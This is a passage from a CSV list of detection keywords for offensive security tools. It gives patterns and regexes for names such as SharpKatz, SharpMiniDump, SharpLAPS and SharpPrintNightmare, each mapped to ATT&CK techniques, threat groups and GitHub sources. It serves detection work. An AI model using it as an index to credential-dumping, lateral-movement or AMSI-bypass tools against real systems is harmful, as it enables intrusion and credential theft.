Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus 
- Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/C0axx/AggressorScripts","1","1","N/A","N/A","10","10","39","12","2019-10-08T12:00:53Z","2019-01-11T15:48:18Z","59038" "*SharpHoundCommon.*",".{0,1000}SharpHoundCommon\..{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59039" "*SharpHoundCommonLib*",".{0,1000}SharpHoundCommonLib.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59040" "*SharpHoundCommonLib.dll*",".{0,1000}SharpHoundCommonLib\.dll.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 
- T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59041" "*SharpHoundCommonLib.LDAPQueries*",".{0,1000}SharpHoundCommonLib\.LDAPQueries.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59042" "*SharpHoundCommonLib.LDAPQueries*",".{0,1000}SharpHoundCommonLib\.LDAPQueries.{0,1000}","offensive_tool_keyword","sharphound","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#content","SharpHound","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","59043" "*SharpIncrease.exe -D 
*",".{0,1000}SharpIncrease\.exe\s\-D\s.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","0","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","59044" "*SharpIncrease-main.zip*",".{0,1000}SharpIncrease\-main\.zip.{0,1000}","offensive_tool_keyword","SharpIncrease","binary padding to add junk data and change the on-disk representation of a file","T1480 - T1027","TA0005","N/A","N/A","Defense Evasion","https://github.com/mertdas/SharpIncrease","1","1","N/A","N/A","6","2","148","30","2024-06-28T21:36:46Z","2023-03-14T23:35:32Z","59045" "*sharpinline *",".{0,1000}sharpinline\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","59046" "*SharpInvoke-SMBExec*",".{0,1000}SharpInvoke\-SMBExec.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59047" "*Sharpkatz*",".{0,1000}Sharpkatz.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its 
agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","0","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59048" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","59049" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59050" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black 
Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","59051" "*SharpKatz.exe*",".{0,1000}SharpKatz\.exe.{0,1000}","offensive_tool_keyword","XiebroC2","Command and control server - multi-person collaborative penetration testing graphical framework","T1105 - T1573.001 - T1055.001 - T1071 - T1041 - T1059.001 - T1059.008 - T1102","TA0011 - TA0003 - TA0005 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/INotGreen/Xiebro-Plugins","1","1","N/A","N/A","10","10","46","8","2025-02-27T09:17:31Z","2024-02-18T02:01:06Z","59052" "*SharpkatzManager*",".{0,1000}SharpkatzManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59053" "*Sharp-Killer.csproj*",".{0,1000}Sharp\-Killer\.csproj.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","59054" "*Sharp-Killer.exe*",".{0,1000}Sharp\-Killer\.exe.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","59055" "*Sharp-Killer.pdb*",".{0,1000}Sharp\-Killer\.pdb.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense 
Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","59056" "*SharpKiller-main*",".{0,1000}SharpKiller\-main.{0,1000}","offensive_tool_keyword","SharpKiller","Lifetime AMSI bypass by @ZeroMemoryEx ported to .NET Framework 4.8","T1211 - T1202 - T1218","TA0005","N/A","N/A","Defense Evasion","https://github.com/S1lkys/SharpKiller","1","1","N/A","N/A","10","4","349","45","2024-08-29T12:23:34Z","2023-10-21T17:27:59Z","59057" "*SharpLAPS.csproj*",".{0,1000}SharpLAPS\.csproj.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","59058" "*SharpLAPS.exe*",".{0,1000}SharpLAPS\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59059" "*SharpLAPS.exe*",".{0,1000}SharpLAPS\..{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","59060" 
"*SharpLAPS.sln*",".{0,1000}SharpLAPS\.sln.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","1","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","59061" "*SharpLAPS-main*",".{0,1000}SharpLAPS\-main.{0,1000}","offensive_tool_keyword","SharpLAPS","Retrieve LAPS password from LDAP","T1552.005 - T1212","TA0006 - TA0007","N/A","Dispossessor","Credential Access","https://github.com/swisskyrepo/SharpLAPS","1","0","N/A","N/A","10","5","408","85","2021-02-17T14:32:16Z","2021-02-16T17:27:41Z","59062" "*SharpLDAP.csproj*",".{0,1000}SharpLDAP\.csproj.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","59063" "*SharpLDAP.exe*",".{0,1000}SharpLDAP\.exe.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","59064" "*SharpLDAP.sln*",".{0,1000}SharpLDAP\.sln.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","59065" "*SharpLDAP-main*",".{0,1000}SharpLDAP\-main.{0,1000}","offensive_tool_keyword","SharpLDAP","tool written in C# that aims to do enumeration via LDAP queries","T1018 - T1069.003","TA0007 - 
TA0011","N/A","N/A","Discovery","https://github.com/mertdas/SharpLDAP","1","1","N/A","N/A","8","1","0","1","2023-01-14T21:52:36Z","2022-11-16T00:38:43Z","59066" "*SharpLdapRelayScan*",".{0,1000}SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","SharpLdapRelayScan","SharpLdapRelayScan is a tool to check Domain Controllers for LDAP server protections regarding the relay of NTLM authentication and it's a C# port of LdapRelayScan","T1557.001 - T1078.003 - T1046","TA0002 - TA0007 - TA0040","N/A","N/A","Discovery","https://github.com/klezVirus/SharpLdapRelayScan","1","1","N/A","network exploitation tool","7","1","81","18","2022-02-26T22:03:11Z","2022-02-12T08:16:59Z","59067" "*SharpLdapRelayScan*",".{0,1000}SharpLdapRelayScan.{0,1000}","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","Dispossessor - Black Basta","Exploitation tool","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","10","3473","535","2024-11-26T07:50:22Z","2018-03-07T12:51:25Z","59068" "*SharpMapExec.exe*",".{0,1000}SharpMapExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools.
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59069" "*SharpMapExec-main.zip*",".{0,1000}SharpMapExec\-main\.zip.{0,1000}","offensive_tool_keyword","SharpMapExec","A sharpen version of CrackMapExec","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/cube0x0/SharpMapExec","1","1","N/A","N/A","10","7","664","124","2021-11-17T17:53:12Z","2020-12-01T13:03:50Z","59070" "*SharpMiniDump*",".{0,1000}SharpMiniDump.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59071" "*SharpMiniDump.exe*",".{0,1000}SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59072" "*SharpMiniDump.exe*",".{0,1000}SharpMiniDump\.exe.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","1","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","59073" "*SharpMiniDumpManager*",".{0,1000}SharpMiniDumpManager.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","59074" "*SharpMove.exe*",".{0,1000}SharpMove\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59075" "*SharpNamedPipePTH*",".{0,1000}SharpNamedPipePTH.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59076" "*SharpNamedPipePTH.exe*",".{0,1000}SharpNamedPipePTH\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59077" "*SharpNBTScan.exe*",".{0,1000}SharpNBTScan\.exe.{0,1000}","offensive_tool_keyword","SharpNBTScan","a NetBIOS scanner. Ghost actors use this tool for hostname and IP address enumeration","T1018 - T1046","TA0007","Ghost Ransomware","N/A","Discovery","https://github.com/BronzeTicket/SharpNBTScan","1","1","N/A","N/A","7","1","71","4","2021-08-06T05:36:55Z","2021-07-12T08:57:39Z","59078" "*SharpNoPSExec*",".{0,1000}SharpNoPSExec.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","59079" "*SharpNoPSExec.csproj*",".{0,1000}SharpNoPSExec\.csproj.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","59080" "*SharpNoPSExec.exe*",".{0,1000}SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly 
builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59081" "*SharpNoPSExec.exe*",".{0,1000}SharpNoPSExec\.exe.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","59082" "*SharpNoPSExec.sln*",".{0,1000}SharpNoPSExec\.sln.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","59083" "*SharpNoPSExec-master*",".{0,1000}SharpNoPSExec\-master.{0,1000}","offensive_tool_keyword","SharpNoPSExec","Get file less command execution for Lateral Movement.","T1021.006 - T1059.003 - T1105","TA0008 - TA0002 - TA0011","N/A","N/A","Lateral Movement","https://github.com/juliourena/SharpNoPSExec","1","1","N/A","N/A","10","7","615","90","2022-06-03T10:32:55Z","2021-04-24T22:02:38Z","59084" "*SharpPersistSD.RegHelper*",".{0,1000}SharpPersistSD\.RegHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET 
library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","59085" "*SharpPersistSD.SecurityDescriptor*",".{0,1000}SharpPersistSD\.SecurityDescriptor.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","59086" "*SharpPersistSD.SvcHelper*",".{0,1000}SharpPersistSD\.SvcHelper.{0,1000}","offensive_tool_keyword","SharpPersistSD","A Post-Compromise granular .NET library to embed persistency to persistency by abusing Security Descriptors of remote machines","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/cybersectroll/SharpPersistSD","1","0","N/A","N/A","10","1","87","12","2024-05-15T14:55:14Z","2024-05-13T15:11:12Z","59087" "*sharppick.exe *",".{0,1000}sharppick\.exe\s.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","59088" "*SharpPrinter.exe*",".{0,1000}SharpPrinter\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","59089" "*SharpPrintNightmare*",".{0,1000}SharpPrintNightmare.{0,1000}","offensive_tool_keyword","SharpPrintNightmare","C# and Impacket implementation of PrintNightmare CVE-2021-1675/CVE-2021-34527","T1210 - T1574 - T1204 - T1053 - T1021 - T1068 - T1071","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Exploitation tool","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","N/A","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","59090" "*SharpPrintNightmare.exe*",".{0,1000}SharpPrintNightmare\.exe.{0,1000}","offensive_tool_keyword","PrintNightmare","PrintNightmare exploitation","T1210 - T1059.001 - T1548.002","TA0001 - TA0002 - TA0004","N/A","Dispossessor","Privilege Escalation","https://github.com/cube0x0/CVE-2021-1675","1","1","N/A","N/A","10","10","1879","582","2021-07-20T15:28:13Z","2021-06-29T17:24:14Z","59091" "*sharpps $psversiontable*",".{0,1000}sharpps\s\$psversiontable.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - 
